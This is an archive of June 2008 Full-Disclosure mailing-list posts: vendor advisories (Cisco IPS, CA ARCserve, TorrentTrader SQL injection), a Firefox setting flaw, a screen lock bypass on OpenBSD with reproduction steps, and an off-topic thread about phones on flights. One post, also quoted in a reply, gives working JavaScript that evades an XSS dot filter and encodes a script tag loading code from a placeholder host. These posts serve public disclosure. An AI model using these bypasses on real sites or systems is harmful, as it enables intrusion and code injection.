Hello, so, with (String) { eval(fromCharCode( /* insert charcodes here */ ) )} is what i needed Regards, Thomas Pollet 2008/6/18 Thomas Pollet <[EMAIL PROTECTED]>: > Hello, > > I came across this site that implemented some filtering so the dots were > replaced by an underscore, also the quotes and backslash were escaped. > I came up with the code below to bypass this filtering (write anything to > the page using String.fromCharCode) > Someone knows a different way to do this? > > > > > > > > > function write(str){ >//document.write() doesn't work as it becomes document_write() >var s = /write/; >var w = String(); >var n = String(); >w += s; >//cast to string so we can index >w += s; >n += w[1] + w[2] + w[3] + w[4] + w[5]; >//call document['write'] >document[n](str); > } > var s = /fromCharCode/; > var w = String(); > var n = String(); > w += s; > n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] + > w[11] + w[12]; > > write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47, > 62,104,60,47,97,62)); > > /* > write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99 > ,111,109,34,62)); > */ > > > > > > Regards, > Thoms Pollet > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
Hi, > There are actually studies going on RIGHT NOW to see if phones can be > allowed to be used during flights by the FCC/FAA, and in other countries as > well. several european carriers now allow mobiles to be used in flight. - i'm bothered more by the person inanely chatting during the flight than security issues - hopefully the hold luggage has been properly scanned anyway - or a dumb timer would do just as well as a mobile. PS lots of people dont turn their phones off. lots of people talk on their phones before going through customs etc. alan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
On Wed, Jun 18, 2008 at 12:26 PM, n3td3v <[EMAIL PROTECTED]> wrote: > Joel Esler said he doesn't switch his phone off on flights and that > anyone who is on a plane with him should watch out. > do u make money from saying his name? you use it in enuff of ur emails. joel - ignore him. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
On Jun 18, 2008, at 12:26 PM, n3td3v wrote: Joel Esler said he doesn't switch his phone off on flights and that anyone who is on a plane with him should watch out. First of all, I said "before I got the iPhone with the 'airplane' mode" I'd forget to turn off my phone alot, i'd throw it in my briefcase when I'd go through security, and forget it's in there. Heck I've seen people actually been able to receive calls on their crackberries while in mid flight. Not that they answered them. But I've seen the phones ring. I have an iPhone now, I place it in airplane mode when I get on a flight. There are actually studies going on RIGHT NOW to see if phones can be allowed to be used during flights by the FCC/FAA, and in other countries as well. Personally I hope this doesn't go through, as I don't want to be sitting next to some dude during my 100,000+ miles I fly a year to hear yacking the whole flight. Is this some kind of dry american humour that i'm missing here or is that not even funny? yes, It was a joke. Sorry if it was in bad taste. -- Joel Esler [EMAIL PROTECTED] http://blog.joelesler.net [m] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo Frame Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Intrusion Prevention System Jumbo Frame Denial of Service Advisory ID: cisco-sa-20080618-ips Revision 1.0 For Public Release 2008 June 18 1600 UTC (GMT) +- Summary === Cisco Intrusion Prevention System (IPS) platforms that have gigabit network interfaces installed and are deployed in inline mode contain a denial of service vulnerability in the handling of jumbo Ethernet frames. This vulnerability may lead to a kernel panic that requires a power cycle to recover platform operation. Platforms deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable. Cisco has released free software updates that address this vulnerability. There is a workaround for this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080618-ips.shtml. Affected Products = Vulnerable Products +-- The following Cisco IPS versions are affected: * Cisco Intrusion Prevention System version 5.x prior to 5.1(8)E2 * Cisco Intrusion Prevention System version 6.x prior to 6.0(5)E2 The following Cisco IPS platforms ship with gigabit network interfaces and are vulnerable if they are deployed in inline mode: * 4235 * 4240 * 4250 * 4250SX * * 4250TX * 4250XL * * 4255 * 4260 * 4270 * The 4250SX and 4250XL models ship with gigabit network interfaces that are normally used for remote administration and monitoring. If the gigabit network interfaces are configured for use with inline mode, the platform is vulnerable. To determine the version of software that is running on a Cisco IPS platform, log into the platform using the console or Secure Shell (SSH) and issue the show version command. sensor# show version Application Partition: Cisco Intrusion Prevention System, Version 6.0(4a)E1 To determine whether a Cisco IPS platform has interfaces configured for inline mode, log into the platform using the console or SSH and issue the show interfaces command. Look for paired interfaces in the Inline Mode statement of the command output. sensor# show interfaces ... MAC statistics from interface GigabitEthernet0/1 Interface function = Sensing interface Description = Media Type = TX Missed Packet Percentage = 0 Inline Mode = Paired with interface GigabitEthernet0/0 ... MAC statistics from interface GigabitEthernet0/0 Interface function = Sensing interface Description = Media Type = TX Missed Packet Percentage = 0 Inline Mode = Paired with interface GigabitEthernet0/1 Products Confirmed Not Vulnerable + The following Cisco IPS platforms are not vulnerable: * 4210 * 4215 * SSM-AIP10 * SSM-AIP20 * SSM-AIP40 * AIM-IPS * NM-CIDS * IDSM2 Cisco IPS version 6.1(1) is not vulnerable. Cisco IOS with the Intrusion Prevention System feature is not vulnerable. No other Cisco products are currently known to be affected by this vulnerability. Details === Certain Cisco IPS platforms contain a denial of service vulnerability in the handling of jumbo ethernet frames. When a specific series of jumbo Ethernet frames is received on a gigabit network interface of a vulnerable Cisco IPS platform that is deployed in inline mode, a kernel panic may occur that results in the complete failure of the platform and causes a network denial of service condition. Cisco IPS platforms that are deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable. Jumbo Ethernet support is usually deployed in data center environments to increase inter-server communication performance and is not a default configuration for Cisco routers and switches. Support for jumbo Ethernet frames must be enabled on each device that require the feature. In order to exploit this vulnerability, an attacker must be able to inject jumbo Ethernet frames to a vulnerable Cisco IPS platform that is deployed in inline mode. If they are configured to use bypass mode to allow traffic to pass in the event of a system failure, all Cisco IPS platforms will fail to forward traffic except for the 4260 and 4270 platforms. The Cisco IPS 4260 and 4270 platforms contain a hardware bypass feature that allows them to pass network traffic in the event of a kernel panic or power outage. They will pass traffic by default if the hardware bypass feature is engaged. This vulnerability is documented in Cisco Bug ID CSCso64762 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-2060. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this
[Full-disclosure] Joel Esler comment on Sans ISC podcast
Joel Esler said he doesn't switch his phone off on flights and that anyone who is on a plane with him should watch out. Is this some kind of dry american humour that i'm missing here or is that not even funny? I'm asking the TSA to listen to his comments made in audio format and decide if this individual should be banned from flying. http://isc.sans.org/diary.html?storyid=4568 All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] xss dot(.) filter evasion
Hello, I came across this site that implemented some filtering so the dots were replaced by an underscore, also the quotes and backslash were escaped. I came up with the code below to bypass this filtering (write anything to the page using String.fromCharCode) Someone knows a different way to do this? function write(str){ //document.write() doesn't work as it becomes document_write() var s = /write/; var w = String(); var n = String(); w += s; //cast to string so we can index w += s; n += w[1] + w[2] + w[3] + w[4] + w[5]; //call document['write'] document[n](str); } var s = /fromCharCode/; var w = String(); var n = String(); w += s; n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] + w[11] + w[12]; write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47, 62,104,60,47,97,62)); /* write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99 ,111,109,34,62)); */ Regards, Thoms Pollet ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities
== Secunia Research 18/06/2008 - TorrentTrader Multiple SQL Injection Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * TorrentTrader 1.08 Classic Edition downloaded before 2008-06-17 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: Exposure of sensitive information Manipulation of data Where: Remote == 3) Vendor's Description of Software "TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent tracker. Featuring intergrated forums, and plenty of administration options." Product Link: http://www.torrenttrader.org/ == 4) Description of Vulnerability Secunia Research has discovered some vulnerabilities in TorrentTrader, which can be exploited by malicious people and malicious users to conduct SQL injection attacks. 1) Input passed to the "email" and "wantusername" parameters in account-signup.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of this vulnerability allows e.g. retrieval of administrator password hashes, but requires that "magic_quotes_gpc" is disabled and that the site is not configured as invite-only. 2) Input passed to the "receiver" parameter in account-inbox.php (when "msg" is set) is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of this vulnerability requires valid user credentials and that "magic_quotes_gpc" is disabled. == 5) Solution Update to TorrentTrader 1.08 Classic Edition downloaded on 2008-06-17 or later. == 6) Time Table 10/06/2008: Contacted the vendor. 17/06/2008: Contacted the vendor again. 17/06/2008: Vendor asks for PoC. 17/06/2008: Sent PoC to the vendor. 17/06/2008: Vendor releases a fixed version. 18/06/2008: Public disclosure. == 7) Credits Discovered by Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2428 for the vulnerabilities. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-15/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - W
[Full-disclosure] Flaw in Firefox 3.0: protocol-handler.warn-external are ignored
these protocol-handler security settings are ignored although they're set to 'true' and no warnings are shown: network.protocol-handler.warn-external.mailto network.protocol-handler.warn-external.news network.protocol-handler.warn-external.nntp network.protocol-handler.warn-external.snews (in about:config) For example, I set network.protocol-handler.warn-external.mailto to 'true', clicked on an e-mail link and Windows Mail is launched without any warnings (tested on Firefox 3.0 on Windows Vista SP1) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)
Well I improved the advisory I released a while ago after I found serval websites wich claim that this is a fake/myth sec. problem because they where not able to reproduce it onto their boxes... The updated version is avaiable at milw0rm (thanks to str0ke) and I recomment that all who mirrored the article do update. milw0rm link: http://www.milw0rm.com/exploits/4028 I even included a lil example to make it fool proof... I was realy impressed that some do think it's a fake/myth and claim that onto their website. So it would be nice if the guys at osvdb.org (and others) may do update their articles, rating and what else matters for them to correct their statements I named a now OS and how to reproduce it. So feel free to install oBSD in a VM. ;] The new version of the "improved" advisory is attached too for your convenience. The bug itself is still the old one Kind regards, Rembrandt _ _ _ _ ___ _ _ _ / / / / / / / _/_ __/ / / / / /_/ / __/ / // / / / / /_/ / / __ / /___/ // / / / / __ / /_/ /_/_/_/___/ /_/ /_/ /_/ Helith - 0815 Author: Rembrandt Date : Known since somewhere in &cant_remember (some years, realy..) Affected Software: screen <= 4.0.3 Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4)) Type: Local Type: Authentication Bypass Greets go to: Helith and all affiliated/loyal people I did not found a Advisory related to this so I decided to write a leet one. screen is vulnerable to a authentication bypass which allows local attackers to gain system access in case screen was locked with a password. It has been tested on OpenBSD + screen 4.0.3 on x86/amd64. But during the nature of the behavior of screen and OpenBSD it should be architecture/version indipendent for now. How to check this? Lock screen using ctrl+x Choose a Password Confirm the Password Screen asks for a Password to unlock the screen. Just press ctrl+c and if you like screen-x to reattach the screen-session. Example: $ testscreen /bin/ksh: testscreen: not found $ Key: Again: Screen used by rembrandt . Password: $ screen -x There are several suitable screens on: 29602.ttyC0.raven (Attached) 25144.ttyC1.raven (Detached) Type "screen [-d] -r [pid.]tty.host" to resume one of them. $ screen -x 25144 $ testscreen /bin/ksh: testscreen: not found $ Because of the nature of a locked screen you wont be able to lock your shell. screen will never ask you for a password. Of course this works also if you get access to a SSH wich has a locked screen running. So in case you have locked your screen session wich contains a open SSH session to a host where you also have a locked screen session you might have no password protection at all in case all systems are OpenBSD. That is just another example. Importent for you should be the combination of screen and OpenBSD. Do not claim it does not work because you just tested this against the latest Linux/Solaris/Whatever. It is known to work and I mentioned the OS. Still it is known that it worked against some scarry Linux distributions wich are not realy common. All security websites wich do report this is a fake may consider to update their reports except of simply claiming wrong things. Have fun! Kind regards, Rembrandt___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Extended HTML Form attack revisited
Hi - Back in 2002 I had published details of a vulnerability affecting most web browsers. It detailed a security flaw that allows attackers to abuse non-HTTP protocols to launch Cross Site Scripting attacks even when a target web application was not vulnerable to XSS. Six years later I'm releasing an update to this research in this paper. This security vulnerability still affects popular web browsers nowadays and the following browsers were tested as vulnerable: * Internet Explorer 6 * Internet Explorer 7 * Internet Explorer 8 (beta 1) * Opera 9.27 * Opera 9.50 * Safari 1.32 * Safari 3.1.1 Others have described how to abuse behavior for purposes other than Cross Site Scripting. NGSSoftware previously published a paper called "Inter-Protocol Exploitation" which references the original EyeonSecurity paper. Paper at: http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf or http://tinyurl.com/5d88ll -- Sandro Gauci EnableSecurity Web: http://enablesecurity.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA ARCserve Backup Discovery Service Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: CA ARCserve Backup Discovery Service Denial of Service Vulnerability CA Advisory Date: 2008-06-17 Reported By: Luigi Auriemma Impact: A remote attacker can cause a denial of service. Summary: CA ARCserve Backup contains a vulnerability in the Discovery service (casdscsvc) that can allow a remote attacker to cause a denial of service condition. CA has issued patches to address the vulnerability. The vulnerability, CVE-2008-1979, occurs due to insufficient verification of client data. An attacker can make a request that can crash the service. Mitigating Factors: None Severity: CA has given this vulnerability a Medium risk rating. Affected Products: CA ARCserve Backup r12.0 Windows CA ARCserve Backup r11.5 Windows SP3 and prior* CA ARCserve Backup r11.1 Windows* CA ARCserve Backup r11.1 Netware* CA Server Protection Suite r2 CA Business Protection Suite r2 CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2 CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2 *Formerly known as BrightStor ARCserve Backup Non-affected Products: CA ARCserve Backup r11.5 Windows SP4 Affected Platforms: Windows and Netware Status and Recommendation: CA has issued the following patches to address the vulnerabilities. CA ARCserve Backup r12.0 Windows: QO99574 CA ARCserve Backup r11.5 Windows: QO99575 For CA ARCserve Backup r11.5 Windows, the issue can also be addressed by applying 11.5 SP4: QO99129 CA ARCserve Backup r11.1 Windows: QO99576 CA ARCserve Backup r11.1 Netware: QO99579 CA Protection Suites r2: QO99575 How to determine if you are affected: CA ARCserve Backup r12.0 Windows: 1. Run the ARCserve Patch Management utility. From the Windows Start menu, it can be found under Programs->CA->ARCserve Patch Management->Patch Status. 2. The main patch status screen will indicate if patch “QO99574” is currently applied. If the patch is not applied, the installation is vulnerable. For more information on the ARCserve Patch Management utility, read document TEC446265. Alternatively, use the file information below to determine if the product installation is vulnerable. CA ARCserve Backup r12.0 Windows, CA ARCserve Backup r11.5 Windows, CA ARCserve Backup r11.1 Windows, CA ARCserve Backup r11.1 Netware, CA Protection Suites r2*: 1. Using Windows Explorer, locate the file “asbrdcst.dll”. By default, the file is located in the “C:\Program Files\CA\SharedComponents\ARCserve Backup\CADS” directory on 32 bit systems and “C:\Program Files (x86)\CA\ SharedComponents\ARCserve Backup\CADS” on 64 bit systems. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file timestamp is earlier than indicated in the below table, the installation is vulnerable. * For Protection Suites r2, use the file timestamp for CA ARCserve Backup r11.5 English Product Ver Product Lang File Name File Sz Timestamp (bytes) 12.0 Windows English asbrdcst.dll 324872 05/01/2008 12:11 12.0 Windows Spanish asbrdcst.dll 324872 05/01/2008 12:11 12.0 Windows Port-Braz asbrdcst.dll 320776 05/01/2008 12:11 12.0 Windows Japanese asbrdcst.dll 320776 05/01/2008 12:11 12.0 Windows Italian asbrdcst.dll 324872 05/01/2008 12:11 12.0 Windows Germanasbrdcst.dll 324872 05/01/2008 12:11 12.0 Windows Frenchasbrdcst.dll 324872 05/01/2008 12:11 12.0 Windows Trad Chinese asbrdcst.dll 316680 05/01/2008 12:11 12.0 Windows Simp Chinese asbrdcst.dll 316680 05/01/2008 12:11 11.5 Windows English asbrdcst.dll 212992 04/22/2008 10:15:02 11.5 Windows Japanese asbrdcst.dll 208896 04/22/2008 14:28:52 11.5 Windows Simp Chinese asbrdcst.dll 204800 04/22/2008 14:30:54 11.5 Windows Trad Chinese asbrdcst.dll 204800 04/22/2008 14:33:28 11.5 Windows Italian asbrdcst.dll 212992 04/22/2008 14:31:46 11.5 Windows Port-Braz asbrdcst.dll 212992 04/22/2008 14:53:54 11.5 Windows Germanasbrdcst.dll 212992 04/22/2008 14:27:48 11.5 Windows Frenchasbrdcst.dll 212992 04/22/2008 14:26:54 11.5 Windows Spanish asbrdcst.dll 212992 04/22/2008 14:32:38 11.1 Windows English asbrdcst.dll 204800 04/24/2008 11:21:26 11.1 Windows Japanese asbrdcst.dll 200704 04/24/2008 11:25:48 11.1 Windows Simp Chinese asbrdcst.dll 196608 04/24/2008 11:27:44 11.1 Windows Trad Chinese asbrdcst.dll 196608 04/24/2008 11:30:32 11.1 Windows Italian asbrdcst.dll 204800 04/24/2008 11:28:38 11.1 Windows Port-Braz asbrdcst.dll 204800 04/24/2008 11:38:52 11.1 Windows Germanasbrdcst.dll 204800 04/24/2008 11:24:38 11.1 Windows Frenchasbrdcst.dll 204800 04/24/2008 11:23:38 11.1 Windows Spanish asbrdcst.dll 204800 04/24/2008 11:29:34 11.1 Windows Dutch asbrdcst.dl
[Full-disclosure] Announcement && CFP: ISOI 5, Tallinn Estonia
The internet Security Operations and Intelligence (ISOI) 5th workshop will take place on the 11th and 12th of September, 2008. Venue: Tallinn, Estonia. Host: Estonian CERT (www.cert.ee). Attendance: While payment is not required, to attend you must be a member of one of the vetted operational communities, or contact us directly for special consideration. CFP information: The topics for the CFP include operational nsp security, Internet incident response, Internet fraud, cyber crime investigations and general case studies. You can email your suggestions, including a title, short abstract and prefered day and time to me personally up to the 28th of July. Late submissions for turbo-talks is possible. For more information you can check out the web pages for previous ISOI workshops: Yahoo - http://isotf.org/isoi44html ICANN/ISOC/Afilias - http://isotf.org/isoi3.html Microsoft - http://isotf.org/isoi2.html Cisco - http://isotf.org/isoi.html A perliminary program will become available in a few weeks on: http://isotf.org/isoi5.html Gadi Evron && Randy Vaughn. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype chat encryption with OTR
For all you OS X guys that like skype because of it's usability but are concerned about the lacks of and end-to-end message encryption system (a plug-in for skype). Today i tried: #1 Get and install Adium (I suggest portable adium in a separated filevault volume) http://www.freesmug.org/portableapps/adium/ #2 Get and install Skype plug-in for Adium http://myjobspace.co.nz/images/pidgin/ #3 Enable OTR encryption on Skype chat (trough Adium client) http://www.cypherpunks.ca/otr/ Et voilà, end-to-end deniable encryption for Skype chat messages. The funny thing is that you can see the encrypted chat and key exchange on standard Skype messaging window, so you can verify yourself that all stuff are enciphered. Now i feel myself more comfortable and will sleep +10minutes each night. Cheers Fabio/naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/